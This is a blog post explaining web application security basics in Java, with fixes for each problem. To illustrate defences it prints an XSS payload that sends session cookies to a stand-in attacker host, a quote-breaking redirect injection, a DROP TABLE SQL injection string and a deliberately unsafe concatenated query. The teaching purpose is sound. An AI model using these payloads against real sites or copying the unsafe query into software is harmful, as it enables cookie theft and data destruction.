Web Application Security

One of the biggest challenges on the web is security. Everyone recognizes the need for security, but few have a clear idea of how to go about it. The standard perception is that you log in with your credentials, the application or website authenticates them, and takes you to your home page. And yes, there is authorization, where you are given access based on your role. Authentication and authorization, though, are only a very basic view of web security; there is a much larger scope to be explored.

The problem is quantifying security, or answering the question “how secure is secure enough for your web application?” It is not possible to explore the entire subject in a single article; what this post intends to do is take a broad look at some of the security risks and how to tackle them. Basically it comes down to a question of trust. Do we trust the integrity of data coming in from a browser? Do we trust that the connection between the browser and the application can’t be tampered with?

Validating Form Input

When we enter data in an HTML form, we tend to trust that the data is valid, thanks to form validation done by client-side JavaScript or server-side rules. But can the data arriving from a form be trusted? No.

Even if we are using HTTPS and doing form validation in the browser, the data we get from a form is basically untrustworthy. A user can modify the markup, or skip the form altogether and submit false data with a tool like curl. The request could also originate from a hostile website. The problem with malformed data is that it can cause unexpected behavior or data leaks. For example, take the following code, where the user selects a type of notification:

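final String notificationType = req.getParameter("notification");

// Compare from the constant side so a missing (null) parameter cannot throw.
if ("email".equals(notificationType)) {
    notifyEmail();
} else if ("SMS".equals(notificationType)) {
    notifySMS();
} else {
    // Anything unexpected lands here, including a missing parameter.
    showError("Select valid notification kind");
}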

How do we ensure that uncontrolled flow is eliminated here? This is where input validation comes in. Invalid input data can violate business logic, trigger faults, or even allow an attacker to take control. Input validation is often the first line of defense against this risk. It works best for values restricted to a known set or range. For example, during a fund transfer, an amount like -9000 makes no sense. Accepting only input that is known to be good is called positive validation or whitelisting. But what should we do when input fails validation? In the above example, if you get a value other than SMS or email, there is either a bug or an attack. If the notificationType is “Chat”, you may show an error message saying Chat is not a valid notification. But what if you have a notificationType like

<script>new Image().src = 'http://badguy.ratnakar.com/steal?' + document.cookie</script>

This is a more serious reflected XSS attack that steals session cookies. If the error message echoes the value back, the script runs in the user’s browser, so you can’t safely include the input in user feedback. One option is to filter out the <script> tag. This strategy of rejecting input that contains known dangerous values is called negative validation or blacklisting. The problem is that the list of possibly dangerous values is very large and needs to be maintained. Another option is sanitization, where instead of rejecting undesirable input, we simply filter the undesirable parts out. Again this is not particularly safe, as an attacker could bypass the filter.

Most frameworks, like Struts and Spring, have built-in input validation functionality, and it is also available in external libraries. The advantage here is that validation logic is pushed to the first layer of your web tier, ensuring that invalid data does not reach the rest of your application.
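To make positive validation concrete, here is a minimal sketch for the notification example above. The class name NotificationTypeValidator and its validate method are hypothetical, made up for illustration; a real application would more likely use its framework's validation support.

```java
import java.util.Optional;
import java.util.Set;

// Hypothetical helper for illustration; not part of any framework.
final class NotificationTypeValidator {
    // The complete set of values the application is prepared to handle.
    private static final Set<String> ALLOWED = Set.of("email", "SMS");

    private NotificationTypeValidator() {}

    // Returns the value only if it exactly matches an allowed entry.
    // Null, empty, or unexpected input yields Optional.empty().
    static Optional<String> validate(String raw) {
        if (raw != null && ALLOWED.contains(raw)) {
            return Optional.of(raw);
        }
        return Optional.empty();
    }
}
```

The caller never echoes the rejected value back to the user; it only needs to know whether validation passed.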

Encode HTML Output

Apart from input data, developers also need to look at the output. A standard web application has HTML markup for structure, CSS for styling, JavaScript for logic, and user-generated content from the server side, all rendered together as one page. Browsers try to render content even if it is malformed, which is a major point of vulnerability. The risk becomes higher when you render data from an untrusted source. As we saw earlier, what happens if we get input containing special characters like {}, <>, or “? This is where output encoding comes in.

Output encoding is the process of converting output data to a form that is safe for its final format. The catch is that you may need a different encoding depending on how the data is consumed. Without proper encoding, the client may receive misformatted data that could be exploited by an attacker. For example, say our PM himself is a customer of the site. In HTML his name would be

<p> Narendra  Modi</p>

which renders as Narendra Modi.

But what happens if we get output like

document.getElementById('name').innerText = 'Narendra 'Damodardas' Modi'; // <-- unescaped string

This is malformed JavaScript, which is exactly what attackers look for. Now if the PM enters his name as

Narendra 'Damodar' Modi ';window.location='http://villian.gabbarsingh.com/';

the script sends the user to a hostile website. This is where you need to implement encoding strategies, for example:

'Narendra \'Damodar\' Modi \';window.location=\'http://villian.gabbarsingh.com/\';'

This is just one way of encoding, using the \ character to escape quotes. Most frameworks have mechanisms for rendering content safely and escaping reserved characters. With a plethora of frameworks and encoding contexts available, there are certain rules to observe. Check what kind of encoding your framework does, and for which context (HTML body, attribute, JavaScript, URL). While you could encode data before storing it rather than at rendering time, that often adds a lot of complexity to the code and makes it harder to output the data in a non-HTML format.
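As a rough sketch of output encoding for the HTML context only, the reserved characters can be replaced with character references before untrusted text is written into a page. The HtmlEncoder class below is a hypothetical illustration. It does not cover the JavaScript or URL contexts, which need their own encoders, and in practice a framework's or library's encoder is the better choice.

```java
// Hypothetical helper for illustration; covers the HTML body and
// quoted-attribute contexts only, not JavaScript or URL contexts.
final class HtmlEncoder {
    private HtmlEncoder() {}

    // Replaces the characters that have special meaning in HTML
    // with their character references.
    static String escapeHtml(String input) {
        if (input == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

With this, a name like Narendra 'Damodar' Modi is rendered as visible text, and any embedded markup stays inert instead of being parsed by the browser.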

Bind Parameters for Database Queries

The database is the most crucial part of a web application, as it contains state that can’t be easily restored. It also holds sensitive information that needs to be protected. Whether you are using SQL, an ORM, or a NoSQL database, you need to look at how input data is used in your queries. Let’s say I have this method for adding new students:

void addStudent(String lastName, String firstName) throws SQLException {
    // UNSAFE: user input is concatenated straight into the SQL text.
    String query = "INSERT INTO students (last_name, first_name) VALUES ('"
            + lastName + "', '" + firstName + "')";
    getConnection().createStatement().execute(query);
}

Now if I add a student with first name “Ratnakar” and last name “Sadasyula”, the resulting SQL would be

INSERT INTO students (last_name, first_name) VALUES ('Sadasyula', 'Ratnakar')

But if the first name passed in is something like Bobby'); DROP TABLE Students;-- then the resulting SQL becomes

INSERT INTO students (last_name, first_name) VALUES ('AAA', 'Bobby'); DROP TABLE Students;-- ')

This actually ends up executing two commands: the INSERT as well as DROP TABLE Students.

This kind of SQL injection has ample scope for misuse, including violating data integrity and exposing sensitive information.

A very simple approach to this issue is parameter binding, as below. This separates executable code from content, so the input is always handled as plain data. It also makes the code cleaner and more comprehensible.

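void addStudent(String lastName, String firstName) throws SQLException {
    String sql = "INSERT INTO students (last_name, first_name) VALUES (?, ?)";
    // try-with-resources closes the statement even if execution fails
    try (PreparedStatement stmt = getConnection().prepareStatement(sql)) {
        stmt.setString(1, lastName);   // bound as data, never parsed as SQL
        stmt.setString(2, firstName);
        stmt.execute();
    }
}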

In JDBC it is always preferable to use parameter binding rather than string concatenation when building queries. The same goes for Hibernate or JPA, using setParameter. And even if you have a NoSQL database, it can still be vulnerable to injection attacks.

Protecting Data in Transit

So far we have looked only at input and output data, but what about data in transit? If we are using a plain HTTP connection, the data is transferred in plain text and is vulnerable to misuse. In transit between the browser and the server, an attacker can eavesdrop on or tamper with the data in what is called a man-in-the-middle attack. Open Wi-Fi networks, like those in airports or cafes, are especially vulnerable. Even an ISP could inject ads into the traffic, or the connection could be used for surveillance.

HTTPS was originally used to secure sensitive web data, like financial transactions, but it has now become the default even on social networking sites. The HTTPS protocol uses Transport Layer Security (TLS), the successor to SSL (Secure Sockets Layer), to secure communications. It provides confidentiality and data integrity, as well as authentication of the website’s identity. It had some initial hurdles, like the cost of hardware and the limit of only one website certificate per IP address. Modern hardware has made it cheaper, and a protocol extension called SNI (Server Name Indication) has made it possible to serve certificates for multiple websites from a single IP address. The introduction of free certificate services like Let’s Encrypt has also made it more widespread.

When we use TLS, a site proves its identity using a public key certificate. The certificate contains information about the site along with a public key, and the site proves it is the owner of the certificate using the matching private key that only it knows. Generally a trusted third party called a Certificate Authority (CA) verifies the site’s identity and grants a signed certificate to indicate it has been verified. Different levels of certification are offered, the most basic being Domain Validation (DV), which certifies that the certificate owner controls a domain. Others, like Organization Validation (OV) and Extended Validation (EV), involve additional checks.

You can configure your server to support HTTPS. But how do we make sure our site or application is compatible with users who might be on very old browsers that support only older protocols and algorithms? Supporting dated versions of protocols makes the site vulnerable to attack. Fortunately there are tools like Mozilla’s SSL Configuration Generator that generate configurations for common web servers. Many websites use HTTPS for only some resources, say the login page or confidential data. The problem is that any plain HTTP request in between is susceptible to a man-in-the-middle attack. We can’t simply shut down the HTTP port either, as browsers usually start with HTTP when a user types in an address without a scheme, so the server has to redirect those requests to HTTPS.

However, just redirecting requests is risky by itself, since the first request still travels over plain HTTP. To get over this, most browsers nowadays support a powerful feature called HSTS (HTTP Strict Transport Security), which lets a site tell the browser to interact with it only over HTTPS. Once a browser has seen the HSTS header from a site, it automatically converts HTTP requests to that site into HTTPS. Setting the Secure flag on a cookie also instructs the browser to send it only over HTTPS, which keeps sensitive information like session IDs off plain connections. Finally, you can use the SSL Labs SSL Server Test to perform a deep analysis of your configuration.
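For illustration, the two server-side pieces described above, the redirect target and the HSTS header, can be sketched as plain string builders. The TransportHeaders class and its method names are hypothetical; how the values are attached to a response depends on your server or framework. The header name Strict-Transport-Security and its max-age and includeSubDomains directives are the standard ones.

```java
// Hypothetical helper for illustration; it only builds the values.
final class TransportHeaders {
    static final String HSTS_HEADER_NAME = "Strict-Transport-Security";

    private TransportHeaders() {}

    // Builds the HSTS header value. max-age tells the browser how many
    // seconds to keep using HTTPS only for this site.
    static String hstsValue(long maxAgeSeconds, boolean includeSubDomains) {
        if (maxAgeSeconds < 0) {
            throw new IllegalArgumentException("max-age must not be negative");
        }
        String value = "max-age=" + maxAgeSeconds;
        return includeSubDomains ? value + "; includeSubDomains" : value;
    }

    // Builds the Location for redirecting a plain HTTP request to HTTPS.
    // The host should come from server configuration, not from the request.
    static String httpsRedirectTarget(String configuredHost, String pathAndQuery) {
        return "https://" + configuredHost + pathAndQuery;
    }
}
```

A one-year policy would then be sent as Strict-Transport-Security: max-age=31536000; includeSubDomains on HTTPS responses; browsers ignore the header when it arrives over plain HTTP.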

Protecting User Passwords

Passwords are one of the most vulnerable assets of your application. While storing the user ID and password as-is in a database table is the most obvious approach, it is not at all recommended. It does keep out invalid users, but it is vulnerable in many other ways. Someone like an application developer or DBA who has access to the credentials can easily impersonate a user. And storing passwords in the database with no cryptographic protection means anyone who breaches the database gets every password.

One way of securing passwords is hashing. A cryptographic hashing algorithm transforms the password into a fixed-length value that is hard to reverse, so the original password cannot easily be recovered from it. For example, if you have the password “helloworld”, applying a hashing algorithm gives some hex result, and that is what gets stored in the database. To validate a login, apply the same hashing algorithm to the password entered, and if the result matches the stored hash, the password is valid.

The issue here, though, is that if multiple users have the same password “helloworld”, you will have the same hash in the database for each of them. An attacker who gets hold of the password store can reverse the hashes by cross-referencing them against a lookup table of precomputed hashes for common passwords.

This is where we use a “salt”: some extra random data added to the password before hashing. The advantage is that two instances of the same password won’t have the same hash value. So if two users have the password “helloworld”, you can use the salt string “ABCE” for one and “DFDGF” for the other, ensuring two different hash values. A work factor makes each hash deliberately slow to compute, which slows down brute-force guessing. What you store for each password is the hash, the salt, and the work factor. When a user logs in, the application uses the stored salt and work factor to hash the password entered and compares the result with the hash in the database.
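The hash, salt and work factor scheme can be sketched with the JDK's built-in PBKDF2 support. The choice of PBKDF2 is an assumption made for this example (the post does not name an algorithm), and the PasswordHasher class, its method names, and the sizes are illustrative. Pick the iteration count according to current guidance for your hardware.

```java
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.security.SecureRandom;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

// Hypothetical helper for illustration, using PBKDF2 from the JDK.
final class PasswordHasher {
    private static final int SALT_BYTES = 16;  // illustrative size
    private static final int KEY_BITS = 256;   // length of the derived hash
    private static final SecureRandom RANDOM = new SecureRandom();

    private PasswordHasher() {}

    // A fresh random salt for every stored password.
    static byte[] newSalt() {
        byte[] salt = new byte[SALT_BYTES];
        RANDOM.nextBytes(salt);
        return salt;
    }

    // Derives the hash; iterations is the work factor.
    static byte[] hash(char[] password, byte[] salt, int iterations) {
        PBEKeySpec spec = new PBEKeySpec(password, salt, iterations, KEY_BITS);
        try {
            return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                    .generateSecret(spec)
                    .getEncoded();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException("PBKDF2 is not available", e);
        } finally {
            spec.clearPassword();
        }
    }

    // Re-hashes the candidate with the stored salt and work factor,
    // then compares using MessageDigest.isEqual rather than a plain loop.
    static boolean verify(char[] candidate, byte[] salt, int iterations, byte[] expected) {
        return MessageDigest.isEqual(hash(candidate, salt, iterations), expected);
    }
}
```

Because each user gets a different salt, two users with the password “helloworld” end up with different stored hashes, and a precomputed lookup table is of no use.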

Authenticate Users

Authentication is basically validating a user’s identity when they log into an application. Authorization defines what a user is allowed to do. For example, if you log into a banking application, you can check your balance statement but cannot modify it. Authentication and authorization come together in session management. Session management relates requests to a particular user, so that the user does not have to authenticate on each request. Once a user is authenticated, their identity is tied to a session for subsequent requests.

One concern is how to keep credentials private when they are sent over a network. The easiest way is to use HTTPS for all requests. The most common scheme is a login form, where the user enters credentials that are validated against the database. We can also authenticate users using a PIN or a mobile code. One of the more convenient options is SSO (Single Sign On), where users log in to many sites with a single identity. For example, many sites let you log in using your Google credentials. Here SSO relies on an external service to manage the login. At times a single factor of authentication, like a user name and password, may not be enough. In that case you can use 2FA (Two Factor Authentication), where the second factor could be a secret code sent to your mobile phone or a hardware token. For example, an online shopping or travel website may send a secret code to the user’s mobile to validate a transaction. Also, when a user enters an invalid password, keep the error message generic and offer a password reset link by email, rather than revealing details about what was wrong. Most frameworks have authentication mechanisms that support a variety of schemes, good examples being Apache Shiro and Spring Security.

Protecting User Sessions

HTTP, being stateless, has no built-in mechanism for relating user data across requests, which is why we use sessions. Sessions are an attractive target for attacks: if someone hijacks an authenticated session, they effectively bypass authentication. One safeguard is to use an existing framework to handle session management. Sessions are typically tracked using a session identifier inside a cookie, sent by the user’s browser. If an attacker manages to get hold of a session ID, they can hijack the entire session. For example, if session IDs follow a recognizable sequence, say AAA243HH and AAA3484KK, an attacker can work out the pattern and guess other valid IDs.

To get over this, it’s better to have a session ID of at least 128 bits, generated using a cryptographically secure pseudorandom number generator. Some implementations put user information inside the cookie to avoid a lookup in a data store. Unless implemented with care, this can lead to more problems. If you do need to store data in a cookie, do not store confidential data like the user ID or password, and limit the length. Also do not expose session identifiers in a URL, as they can leak to third parties who could use them for their own ends.
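A 128-bit session ID from a secure generator takes only a few lines with the JDK. The SessionIds class is a hypothetical name for this sketch, and the URL-safe Base64 encoding is just one convenient way to turn the random bytes into a cookie-friendly string.

```java
import java.security.SecureRandom;
import java.util.Base64;

// Hypothetical helper for illustration.
final class SessionIds {
    private static final SecureRandom RANDOM = new SecureRandom();

    private SessionIds() {}

    // 16 random bytes = 128 bits, encoded as 22 URL-safe characters.
    static String newSessionId() {
        byte[] bytes = new byte[16];
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}
```

Unlike a counter or a timestamp, consecutive IDs produced this way share no pattern an attacker could extrapolate from.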

If you are using cookies, some simple precautions make sure they are not unintentionally exposed. There are four attributes to look at. Domain restricts the scope of a cookie to a particular domain, and Path to a path and its subpaths. Make sure that Path and Domain are as restrictive as possible. The Secure flag indicates that the browser should send the cookie only over HTTPS. The HttpOnly flag indicates that the cookie should not be accessible to JavaScript or any other client-side script. So it could be something like

Set-Cookie: sessionId=[FDJ5435JJJ]; Path=/mybooks/; Secure; HttpOnly; Domain=mybooks.ratnakar.com

Another way to reduce risk is effective management of the session lifecycle. An attacker may be able to set the session ID to one they already know, for example through a hidden form field, before the victim logs in. This attack is called session fixation. There are two ways to tackle it. First, create a new session whenever a user authenticates or moves to a higher privilege level. Second, always generate the session ID on the server rather than accepting one supplied by the client. We also set session timeouts, to limit the window in which an attacker can use a stolen session. The right timeout depends on the application: Facebook might have a long timeout, while your net banking application might time out after just 10 minutes.
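The lifecycle rules above (a fresh ID on login, server-generated IDs, and an idle timeout) can be sketched with a small in-memory store. SessionStore and its methods are hypothetical, written only to show the idea. A real application should rely on its framework's session management, which handles this along with persistence and clustering.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical in-memory session store for illustration only.
final class SessionStore {
    private static final class Session {
        final String userId;       // null until the user authenticates
        final Instant lastAccess;
        Session(String userId, Instant lastAccess) {
            this.userId = userId;
            this.lastAccess = lastAccess;
        }
    }

    private final Map<String, Session> sessions = new ConcurrentHashMap<>();
    private final SecureRandom random = new SecureRandom();
    private final Duration idleTimeout;

    SessionStore(Duration idleTimeout) {
        this.idleTimeout = idleTimeout;
    }

    // IDs are always generated here, never accepted from the client.
    private String newId() {
        byte[] bytes = new byte[16];
        random.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    String createAnonymous(Instant now) {
        String id = newId();
        sessions.put(id, new Session(null, now));
        return id;
    }

    // On login the old ID is discarded and a fresh one is issued,
    // so an ID planted before login becomes useless.
    String login(String oldId, String userId, Instant now) {
        if (oldId != null) {
            sessions.remove(oldId);
        }
        String id = newId();
        sessions.put(id, new Session(userId, now));
        return id;
    }

    // Returns the authenticated user ID, or null if the session is
    // unknown, anonymous, or has been idle longer than the timeout.
    String authenticatedUser(String id, Instant now) {
        if (id == null) {
            return null;
        }
        Session s = sessions.get(id);
        if (s == null) {
            return null;
        }
        if (Duration.between(s.lastAccess, now).compareTo(idleTimeout) > 0) {
            sessions.remove(id);
            return null;
        }
        sessions.put(id, new Session(s.userId, now)); // refresh idle timer
        return s.userId;
    }
}
```

The timeout is a constructor argument because, as noted above, the right value differs between a social site and a banking application.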

Authorize Actions

We have seen that authorization enforces what a user may and may not access. Authorization must always be done on the server; just hiding the delete button on a page, for example, is not protection, since the user can still send the request. The client should never pass authorization information to the server; it should pass only temporary information like session IDs. By default, deny any action to the user unless it is explicitly allowed.

Generally speaking there are two kinds of authorization: global permissions and resource-level permissions. Global permissions are generally straightforward, as they apply across all resources. For example, a check before shutting down the server could be something like

public String shutdown(User callingUser) {
    if (callingUser != null && callingUser.hasPermission(Permission.SHUTDOWN)) {
        doShutdown();
        return "SUCCESS";
    } else {
        return "PERMISSION_DENIED";
    }
}

Resource-level authorization, on the other hand, is more complex, as it checks whether an actor can act on a particular resource. For example, a user has the right to modify only their own profile, not others’.

If we take the entire process, it is as follows:

  • An actor becomes a principal after authentication.
  • Policy specifies what actions the principal can take against a resource.
  • Only if the policy allows the action is it executed.
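The profile example and the steps above can be sketched as a small policy check. ProfilePolicy, its Action enum, and the rule that any authenticated user may view a profile are assumptions made for illustration. The principal ID is expected to come from the server-side session, never from a request parameter.

```java
// Hypothetical policy for illustration.
final class ProfilePolicy {
    enum Action { VIEW, MODIFY }

    private ProfilePolicy() {}

    // principalId: the authenticated user's ID from the server-side session.
    // profileOwnerId: the owner of the profile being acted on.
    static boolean isAllowed(String principalId, Action action, String profileOwnerId) {
        // Deny by default when anything is missing.
        if (principalId == null || action == null || profileOwnerId == null) {
            return false;
        }
        switch (action) {
            case VIEW:
                return true; // assumption: any authenticated user may view
            case MODIFY:
                return principalId.equals(profileOwnerId); // owners only
            default:
                return false;
        }
    }
}
```

The calling code performs the action only when isAllowed returns true, and otherwise returns a permission error without touching the resource.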

The most common form of authorization is RBAC (Role Based Access Control), where users are given roles, which in turn are assigned permissions. For example, if an Admin has permission to delete users, we implement the code in such a way that only Admins can perform the action. Here we link the action to the role instead of the user’s identity, so whoever is an Admin can delete users.

But what if some admins have the privilege to add and modify users but not to delete them? In such a case, it is more appropriate to go with permission based access control instead of just roles. So here we map the user’s identity to individual permissions. Basically, role based access works well if you have a fixed set of permissions and there is not a large number of permutations of user permissions.
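One way to picture roles and permissions together is a pair of enums, where each role carries a set of permissions and the code checks the permission rather than the role name. The Rbac class and the role and permission names below are hypothetical, chosen to mirror the add, modify, and delete example.

```java
import java.util.Collections;
import java.util.EnumSet;
import java.util.Set;

// Hypothetical roles and permissions for illustration.
final class Rbac {
    enum Permission { ADD_USER, MODIFY_USER, DELETE_USER }

    enum Role {
        ADMIN(EnumSet.allOf(Permission.class)),
        USER_MANAGER(EnumSet.of(Permission.ADD_USER, Permission.MODIFY_USER)),
        VIEWER(EnumSet.noneOf(Permission.class));

        private final Set<Permission> permissions;

        Role(Set<Permission> permissions) {
            this.permissions = Collections.unmodifiableSet(permissions);
        }

        boolean allows(Permission permission) {
            return permissions.contains(permission);
        }
    }

    private Rbac() {}

    // Allowed only if at least one of the user's roles grants the
    // permission; everything else is denied by default.
    static boolean isAllowed(Set<Role> roles, Permission permission) {
        if (roles == null || permission == null) {
            return false;
        }
        for (Role role : roles) {
            if (role.allows(permission)) {
                return true;
            }
        }
        return false;
    }
}
```

Because callers ask about DELETE_USER rather than about ADMIN, a restricted admin role can be introduced later without touching the code that performs the check.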

However, if you need finer-grained control that can’t be handled with just RBAC, it is better to go for Attribute Based Access Control (ABAC). For example, I may want to grant permissions based on a user’s job description or country. I might want admins in India to read and update the user list, but admins in China to only read it. Or admins may not be allowed to delete users on a national holiday or weekend. You can make use of XACML here, a policy language standardized by OASIS. ABAC can be used when permissions are highly dynamic and access control needs to factor in such attributes.
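To give a feel for ABAC without bringing in XACML, the country and weekend rules above can be written as a plain function over attributes. UserListPolicy, its parameter names, and the country codes are assumptions for this sketch, and the holiday rule is left out because it would need a holiday calendar.

```java
import java.time.DayOfWeek;
import java.time.LocalDate;

// Hypothetical attribute-based policy for illustration.
final class UserListPolicy {
    enum Action { READ, UPDATE, DELETE }

    private UserListPolicy() {}

    // The decision depends on attributes of the subject (role, country),
    // the action, and the environment (today's date).
    static boolean isAllowed(String role, String country, Action action, LocalDate today) {
        if (!"admin".equals(role) || country == null || action == null || today == null) {
            return false; // deny by default
        }
        switch (action) {
            case READ:
                return true;                  // all admins may read
            case UPDATE:
                return "IN".equals(country);  // only admins in India may update
            case DELETE: {
                DayOfWeek day = today.getDayOfWeek();
                return day != DayOfWeek.SATURDAY && day != DayOfWeek.SUNDAY;
            }
            default:
                return false;
        }
    }
}
```

In a real system such rules usually live in a policy engine or configuration rather than in code, so they can change without a redeploy.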

Other approaches that can be considered are:

MAC (Mandatory Access Control): a centrally managed policy that can’t be overridden, based on the security attributes of subjects and resources.

ReBAC (Relationship Based Access Control): policy determined by the relationship between principals and resources.

DAC (Discretionary Access Control): access control managed by the owner of each resource.

And finally some standard precautions:

  • Set the Cache-Control header to “private, no-cache, no-store” for protected resources, so that responses are not served from a cache and your server-side authorization code is always called.
  • Reduce duplication of authorization logic, so that the rules live in one place and are applied consistently.

 

 

 

 

About Ratnakar Sadasyula

I am a 40-year-old blogger with a passion for movies, music, books, quizzing and politics. A techie by profession, and a writer at heart. Seeking to write my own book one day.